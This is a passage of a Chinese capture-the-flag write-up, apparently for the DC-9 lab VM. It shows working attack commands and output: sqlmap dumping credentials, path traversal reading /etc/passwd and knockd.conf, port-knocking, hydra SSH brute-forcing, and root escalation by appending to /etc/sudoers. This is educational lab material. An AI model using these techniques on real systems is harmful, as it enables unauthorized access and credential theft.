<h3 id="将数据保存下来"><a href="#将数据保存下来" class="headerlink" title="将数据保存下来"></a>将数据保存下来</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─ <span class="built_in">cat</span> /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, <span class="string">&#x27;&#123;print $1&#125;&#x27;</span> &gt; user.txt</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─<span class="built_in">cat</span> /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, <span class="string">&#x27;&#123;print $2&#125;&#x27;</span> &gt; pass.txt</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# <span class="built_in">cat</span> user.txt                                                                                                  </span><br><span class="line">username</span><br><span class="line">marym</span><br><span class="line">julied</span><br><span class="line">fredf</span><br><span class="line">barneyr</span><br><span class="line">tomc</span><br><span class="line">jerrym</span><br><span class="line">wilmaf</span><br><span class="line">bettyr</span><br><span class="line">chandlerb</span><br><span class="line">joeyt</span><br><span class="line">rachelg</span><br><span class="line">rossg</span><br><span class="line">monicag</span><br><span class="line">phoebeb</span><br><span class="line">scoots</span><br><span class="line">janitor</span><br><span class="line">janitor2</span><br></pre></td></tr></table></figure>

<h3 id="查看Staff库"><a href="#查看Staff库" class="headerlink" title="查看Staff库"></a>查看Staff库</h3><p>同样的方法查看<code>Staff</code>库中的数据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# sqlmap -l a.txt -D Staff --tables --batch</span><br><span class="line">[18:30:11] [INFO] fetching tables <span class="keyword">for</span> database: <span class="string">&#x27;Staff&#x27;</span></span><br><span class="line">Database: Staff</span><br><span class="line">[2 tables]</span><br><span class="line">+--------------+</span><br><span class="line">| StaffDetails |</span><br><span class="line">| Users        |</span><br><span class="line">+--------------+</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# sqlmap -l a.txt -D Staff -T Users --columns --batch </span><br><span class="line">[18:31:46] [INFO] fetching columns <span class="keyword">for</span> table <span class="string">&#x27;Users&#x27;</span> <span class="keyword">in</span> database <span class="string">&#x27;Staff&#x27;</span></span><br><span class="line">Database: Staff</span><br><span class="line">Table: Users</span><br><span class="line">[3 columns]</span><br><span class="line">+----------+-----------------+</span><br><span class="line">| Column   | Type            |</span><br><span class="line">+----------+-----------------+</span><br><span class="line">| Password | varchar(255)    |</span><br><span class="line">| UserID   | int(6) unsigned |</span><br><span class="line">| Username | varchar(255)    |</span><br><span class="line">+----------+-----------------+</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# sqlmap -l a.txt --batch -D Staff -T Users -C <span class="string">&quot;Username,Password&quot;</span> --dump </span><br><span class="line">Database: Staff</span><br><span class="line">Table: Users</span><br><span class="line">[1 entry]</span><br><span class="line">+----------+----------------------------------+</span><br><span class="line">| Username | Password                         |</span><br><span class="line">+----------+----------------------------------+</span><br><span class="line">| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |</span><br><span class="line">+----------+----------------------------------+</span><br></pre></td></tr></table></figure>

<p><code>password</code>看上去是<code>md5</code>，<code>somd5.com</code>在线爆破一下，结果是<code>transorbital1</code><br><img src="/assets/Pasted%20image%2020260110183639.png"></p>
<h2 id="3-登录"><a href="#3-登录" class="headerlink" title="3.登录"></a>3.登录</h2><p>登录进来发现只是多了几个按钮，增加记录，没有什么作用<br><img src="/assets/Pasted%20image%2020260110183945.png"></p>
<h3 id="etc-passwd"><a href="#etc-passwd" class="headerlink" title="&#x2F;etc&#x2F;passwd"></a>&#x2F;etc&#x2F;passwd</h3><p>找到<code>file</code>真实路径,下面只是演示<br><img src="/assets/Pasted%20image%2020260110184446.png"><br>手动添加<code>payload</code>, 如<code>../../../etc/passwd</code><br><img src="/assets/Pasted%20image%2020260110184612.png"><br>可以看到在<code>../../../../etc/passwd</code> 时<code>length</code>开始变化, 找到真实路径<br><img src="/assets/Pasted%20image%2020260110184828.png"><br>或者<code>url</code>上面多加一些根目录也是可以的<br><img src="/assets/Pasted%20image%2020260110185038.png"></p>
<h3 id="etc-ssh-sshd-config"><a href="#etc-ssh-sshd-config" class="headerlink" title="&#x2F;etc&#x2F;ssh&#x2F;sshd_config"></a>&#x2F;etc&#x2F;ssh&#x2F;sshd_config</h3><p>查看<code>etc/ssh/sshd_config</code>配置文件，浏览器搜索<code>root</code>,查看有用的信息，可以发现不允许<code>root</code>远程<code>ssh</code>登录</p>
<p><img src="/assets/Pasted%20image%2020260110185335.png"></p>
<h3 id="proc-sched-debug"><a href="#proc-sched-debug" class="headerlink" title="&#x2F;proc&#x2F;sched_debug"></a>&#x2F;proc&#x2F;sched_debug</h3><p>将页面上的数据复制，然后到<code>kali</code> 中，执行<code>vi b.txt</code>, 粘贴进去</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.3.45/addrecord.php?file=../../../../proc/sched_debug</span><br></pre></td></tr></table></figure>
<p><img src="/assets/Pasted%20image%2020260110190422.png"><br>将数据处理后可以看到<code>knockd</code>的服务</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# <span class="built_in">cat</span> b.txt|egrep <span class="string">&#x27;[a-zA-Z]+&#x27;</span> -o|<span class="built_in">sort</span>|<span class="built_in">uniq</span>  </span><br><span class="line">...</span><br><span class="line">kdevtmpfs</span><br><span class="line">key</span><br><span class="line">khugepaged</span><br><span class="line">khungtaskd</span><br><span class="line">kintegrityd</span><br><span class="line">knockd <span class="comment">#注意这个服务</span></span><br><span class="line">ksmd</span><br><span class="line">ksoftirqd</span><br><span class="line">kstrp</span><br><span class="line">kswapd</span><br><span class="line">kthreadd</span><br><span class="line">kthrotld</span><br><span class="line">ktime</span><br><span class="line">kworker</span><br><span class="line">latency</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<blockquote>
<p>[!NOTE] 命令解释<br> <code>awk -F, &#39;{print $2}&#39;</code> ：<strong>提取第二列</strong>。<code>awk</code>是一个强大的文本处理工具。<code>-F,</code>指定使用<strong>逗号</strong>作为字段分隔符（CSV文件的标准分隔符）。<code>{print $2}</code>表示打印每一行的第二个字段</p>
</blockquote>
<h3 id="etc-knockd-conf"><a href="#etc-knockd-conf" class="headerlink" title="&#x2F;etc&#x2F;knockd.conf"></a>&#x2F;etc&#x2F;knockd.conf</h3><p>敲门服务，需要依次对三个端口发送SYN包才能启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.3.45/addrecord.php?file=../../../../etc/knockd.conf</span><br><span class="line"></span><br><span class="line">[options] UseSyslog </span><br><span class="line">[openSSH] sequence = 7469,8475,9842 </span><br><span class="line">seq_timeout = 25 </span><br><span class="line">command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j </span><br><span class="line">ACCEPT tcpflags = syn </span><br><span class="line">[closeSSH] </span><br><span class="line">sequence = 9842,8475,7469 </span><br><span class="line">seq_timeout = 25 </span><br><span class="line">command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j </span><br><span class="line">ACCEPT tcpflags = syn</span><br></pre></td></tr></table></figure>


<p>先进行<code>nmap</code>,发现<code>22</code>端口过滤状态，依次执行<code>3</code>次<code>nc</code>命令后，<code>22</code>端口开启</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nmap -p 22 192.168.3.45            </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:09 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.3.45</span><br><span class="line">Host is up (0.00048s latency).</span><br><span class="line"></span><br><span class="line">PORT   STATE    SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br><span class="line"></span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 0.30 seconds</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# 7469,8475,9842         </span><br><span class="line">7469,8475,9842：未找到命令</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nc 192.168.3.45 7469                                                    </span><br><span class="line">(UNKNOWN) [192.168.3.45] 7469 (?) : Connection refused</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nc 192.168.3.45 8475</span><br><span class="line">(UNKNOWN) [192.168.3.45] 8475 (?) : Connection refused</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nc 192.168.3.45 9842</span><br><span class="line">(UNKNOWN) [192.168.3.45] 9842 (?) : Connection refused</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nmap -p 22 192.168.3.45</span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:10 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.3.45</span><br><span class="line">Host is up (0.00057s latency).</span><br><span class="line"></span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br><span class="line"></span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 0.25 seconds</span><br></pre></td></tr></table></figure>

<p>或者直接<code>knock</code>命令启动, 若未安装执行 <code>apt install knockd -y</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# knock 192.168.3.45 7469 8475 9842</span><br></pre></td></tr></table></figure>

<h2 id="4-hydra"><a href="#4-hydra" class="headerlink" title="4.hydra"></a>4.hydra</h2><p>用<code>hrdra</code>爆破ssh登录的账号密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 4</span><br><span class="line"></span><br><span class="line">[STATUS] 80.00 tries/min, 80 tries <span class="keyword">in</span> 00:01h, 281 to <span class="keyword">do</span> <span class="keyword">in</span> 00:04h, 4 active</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: chandlerb   password: UrAG0D!</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: joeyt   password: Passw0rd</span><br><span class="line">[STATUS] 91.33 tries/min, 274 tries <span class="keyword">in</span> 00:03h, 87 to <span class="keyword">do</span> <span class="keyword">in</span> 00:01h, 4 active</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: janitor   password: Ilovepeepee</span><br><span class="line">[STATUS] 89.50 tries/min, 358 tries <span class="keyword">in</span> 00:04h, 3 to <span class="keyword">do</span> <span class="keyword">in</span> 00:01h, 4 active</span><br><span class="line">1 of 1 target successfully completed, 3 valid passwords found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-10 19:25:08</span><br></pre></td></tr></table></figure>
<blockquote>
<p>[!NOTE] -L user.txt</p>
<ul>
<li><code>-L</code>：大写 L，对应「批量用户名」，指定一个文本格式的用户名字典文件（每行一个用户名）</li>
<li><code>user.txt</code>：当前工作目录下的用户名字典文件（若文件不在当前目录，需填写绝对路径，如 &#96;&#x2F;t</li>
</ul>
</blockquote>
<h3 id="用户chandlerb"><a href="#用户chandlerb" class="headerlink" title="用户chandlerb"></a>用户chandlerb</h3><p>无有用的信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">chandlerb@dc-9:~$ <span class="built_in">ls</span> -al</span><br><span class="line">total 12</span><br><span class="line">drwx------  3 chandlerb chandlerb 4096 Jan 10 21:23 .</span><br><span class="line">drwxr-xr-x 19 root      root      4096 Dec 29  2019 ..</span><br><span class="line">lrwxrwxrwx  1 chandlerb chandlerb    9 Dec 29  2019 .bash_history -&gt; /dev/null</span><br><span class="line">drwx------  3 chandlerb chandlerb 4096 Jan 10 21:23 .gnupg</span><br><span class="line">chandlerb@dc-9:~$ <span class="built_in">history</span></span><br><span class="line">    1  <span class="built_in">ls</span> -al</span><br><span class="line">    2  <span class="built_in">history</span></span><br><span class="line">chandlerb@dc-9:~$ <span class="built_in">cd</span> .gnupg/</span><br><span class="line">chandlerb@dc-9:~/.gnupg$ <span class="built_in">ls</span> -l</span><br><span class="line">total 4</span><br><span class="line">drwx------ 2 chandlerb chandlerb 4096 Jan 10 21:23 private-keys-v1.d</span><br><span class="line">chandlerb@dc-9:~/.gnupg$ <span class="built_in">cd</span> private-keys-v1.d/</span><br><span class="line">chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ <span class="built_in">ls</span> -l</span><br><span class="line">total 0</span><br><span class="line">chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ <span class="built_in">sudo</span> -l</span><br><span class="line"></span><br><span class="line">We trust you have received the usual lecture from the <span class="built_in">local</span> System</span><br><span class="line">Administrator. It usually boils down to these three things:</span><br><span class="line"></span><br><span class="line">    <span class="comment">#1) Respect the privacy of others.</span></span><br><span class="line">    <span class="comment">#2) Think before you type.</span></span><br><span class="line">    <span class="comment">#3) With great power comes great responsibility.</span></span><br><span class="line"></span><br><span class="line">[<span class="built_in">sudo</span>] password <span class="keyword">for</span> chandlerb: </span><br><span class="line">Sorry, user chandlerb may not run <span class="built_in">sudo</span> on dc-9.</span><br></pre></td></tr></table></figure>
<h3 id="用户joeyt"><a href="#用户joeyt" class="headerlink" title="用户joeyt"></a>用户joeyt</h3><p>同样没发现有用的数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">joeyt@dc-9:~$ ls -la</span><br><span class="line">total 12</span><br><span class="line">drwx------  3 joeyt joeyt 4096 Jan 10 21:23 .</span><br><span class="line">drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..</span><br><span class="line">lrwxrwxrwx  1 joeyt joeyt    9 Dec 29  2019 .bash_history -&gt; /dev/null</span><br><span class="line">drwx------  3 joeyt joeyt 4096 Jan 10 21:23 .gnupg</span><br><span class="line">joeyt@dc-9:~$ sudo -l</span><br><span class="line"></span><br><span class="line">We trust you have received the usual lecture from the local System</span><br><span class="line">Administrator. It usually boils down to these three things:</span><br><span class="line"></span><br><span class="line">    #1) Respect the privacy of others.</span><br><span class="line">    #2) Think before you type.</span><br><span class="line">    #3) With great power comes great responsibility.</span><br></pre></td></tr></table></figure>

<h3 id="用户janitor"><a href="#用户janitor" class="headerlink" title="用户janitor"></a>用户janitor</h3><p>发现几个密码，添加到刚才的<code>pass.txt</code>中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">janitor@dc-9:~$ ls -la</span><br><span class="line">total 16</span><br><span class="line">drwx------  4 janitor janitor 4096 Jan 10 21:24 .</span><br><span class="line">drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..</span><br><span class="line">lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -&gt; /dev/null</span><br><span class="line">drwx------  3 janitor janitor 4096 Jan 10 21:24 .gnupg</span><br><span class="line">drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin</span><br><span class="line">janitor@dc-9:~$ cat .secrets-for-putin/</span><br><span class="line">cat: .secrets-for-putin/: Is a directory</span><br><span class="line">janitor@dc-9:~$ cd .secrets-for-putin/</span><br><span class="line">janitor@dc-9:~/.secrets-for-putin$ ls -la</span><br><span class="line">total 12</span><br><span class="line">drwx------ 2 janitor janitor 4096 Dec 29  2019 .</span><br><span class="line">drwx------ 4 janitor janitor 4096 Jan 10 21:24 ..</span><br><span class="line">-rwx------ 1 janitor janitor   66 Dec 29  2019 passwords-found-on-post-it-notes.txt</span><br><span class="line">janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt </span><br><span class="line">BamBam01</span><br><span class="line">Passw0rd</span><br><span class="line">smellycats</span><br><span class="line">P0Lic#10-4</span><br><span class="line">B4-Tru3-001</span><br><span class="line">4uGU5T-NiGHts</span><br></pre></td></tr></table></figure>

<p><strong>重新爆破</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 64</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: fredf   password: B4-Tru3-001</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: chandlerb   password: UrAG0D!</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: joeyt   password: Passw0rd</span><br><span class="line">[22][ssh] host: 192.168.3.45   login: janitor   password: Ilovepeepee</span><br></pre></td></tr></table></figure>
<p>发现多了一个用户<code>fredf</code></p>
<h3 id="用户fredf"><a href="#用户fredf" class="headerlink" title="用户fredf"></a>用户fredf</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:~$ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> fredf on dc-9:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User fredf may run the following commands on dc-9:</span><br><span class="line">    (root) NOPASSWD: /opt/devstuff/dist/test/test</span><br></pre></td></tr></table></figure>


<p>查看本地的<code>/etc/sudoers</code><br><img src="/assets/Pasted%20image%2020260110194213.png"></p>
<p>直接查看<code>/opt/devstuff/dist/test/test</code>发现是乱码，到上级目录发现是<code>python</code>文件编译的，直接查看源码<code>test.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff/dist/test$ cd ..</span><br><span class="line">fredf@dc-9:/opt/devstuff/dist$ ls</span><br><span class="line">test</span><br><span class="line">fredf@dc-9:/opt/devstuff/dist$ cd ..</span><br><span class="line">fredf@dc-9:/opt/devstuff$ ls -l</span><br><span class="line">total 20</span><br><span class="line">drwxr-xr-x 3 root root 4096 Dec 29  2019 build</span><br><span class="line">drwxr-xr-x 3 root root 4096 Dec 29  2019 dist</span><br><span class="line">drwxr-xr-x 2 root root 4096 Dec 29  2019 __pycache__</span><br><span class="line">-rw-r--r-- 1 root root  250 Dec 29  2019 test.py</span><br><span class="line">-rw-r--r-- 1 root root  959 Dec 29  2019 test.spec</span><br><span class="line">fredf@dc-9:/opt/devstuff$ cat test.py </span><br><span class="line">#!/usr/bin/python</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">if len (sys.argv) != 3 :</span><br><span class="line">    print (&quot;Usage: python test.py read append&quot;)</span><br><span class="line">    sys.exit (1)</span><br><span class="line"></span><br><span class="line">else :</span><br><span class="line">    f = open(sys.argv[1], &quot;r&quot;)</span><br><span class="line">    output = (f.read())</span><br><span class="line"></span><br><span class="line">    f = open(sys.argv[2], &quot;a&quot;)</span><br><span class="line">    f.write(output)</span><br><span class="line">    f.close()</span><br></pre></td></tr></table></figure>


<blockquote>
<p>[!Info] test.py<br>这个 Python 脚本是一个用于文件操作的工具，它的核心功能是读取一个文件的内容，然后将其追加到另一个文件的末尾。<br>简单来说，这个脚本完成了以下几步：</p>
</blockquote>
<ol>
<li><strong>参数检查</strong>：首先，它检查运行脚本时提供的参数个数。脚本期望除了自身的名字（<code>sys.argv[0]</code>）外，还有两个参数：一个用于读取的文件，一个用于追加的文件。如果参数数量不对，会打印用法说明并退出。</li>
<li><strong>读取文件</strong>：它打开第一个参数指定的文件（<code>sys.argv[1]</code>），读取其全部内容。</li>
<li><strong>追加内容</strong>：接着，它打开第二个参数指定的文件（<code>sys.argv[2]</code>），并将从第一个文件读出的内容追加到它的末尾。<br>一个简单的使用例子如下：</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 假设当前目录有 file1.txt（内容为&quot;Hello&quot;）和 file2.txt（内容为&quot;World&quot;）</span></span><br><span class="line">python test.py file1.txt file2.txt</span><br><span class="line"><span class="comment"># 运行后，file2.txt 的内容将变为 &quot;WorldHello&quot;</span></span><br></pre></td></tr></table></figure>
<h2 id="5-提权"><a href="#5-提权" class="headerlink" title="5.提权"></a>5.提权</h2><p>可以查看本地的<code>/etc/sudoers</code>，将<code>%sudo   ALL=(ALL:ALL) ALL</code>复制到<code>fredf</code>下的<code>a.txt</code>中</p>
<blockquote>
<p>[!Warning] <code>/etc/sudoers</code><br><code>/etc/sudoers</code> 是 Linux&#x2F;Unix 系统中<strong>核心的权限控制文件</strong>，用于定义哪些用户 &#x2F; 用户组可以以何种方式（是否需要密码、可执行哪些命令）临时获取 <code>root</code> 或其他用户的权限。其设计目标是在保障系统安全的前提下，实现权限的精细化分配，</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://www.doubao.com/thread/w91afa01ef034300b">https://www.doubao.com/thread/w91afa01ef034300b</a> 介绍<code>/etc/sudoers</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ cd /tmp</span><br><span class="line">fredf@dc-9:/tmp$ nano a.txt</span><br><span class="line">fredf@dc-9:/tmp$ cat a.txt </span><br><span class="line">fredf   ALL=(ALL:ALL) ALL</span><br><span class="line">fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test a.txt /etc/sudoers</span><br><span class="line">fredf@dc-9:/tmp$ sudo su -</span><br><span class="line">[sudo] password for fredf: </span><br><span class="line">root@dc-9:~# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line"></span><br><span class="line">root@dc-9:~# cat theflag.txt </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗</span><br><span class="line">████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║</span><br><span class="line">██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║</span><br><span class="line">██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝</span><br><span class="line">██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗</span><br><span class="line">╚═╝  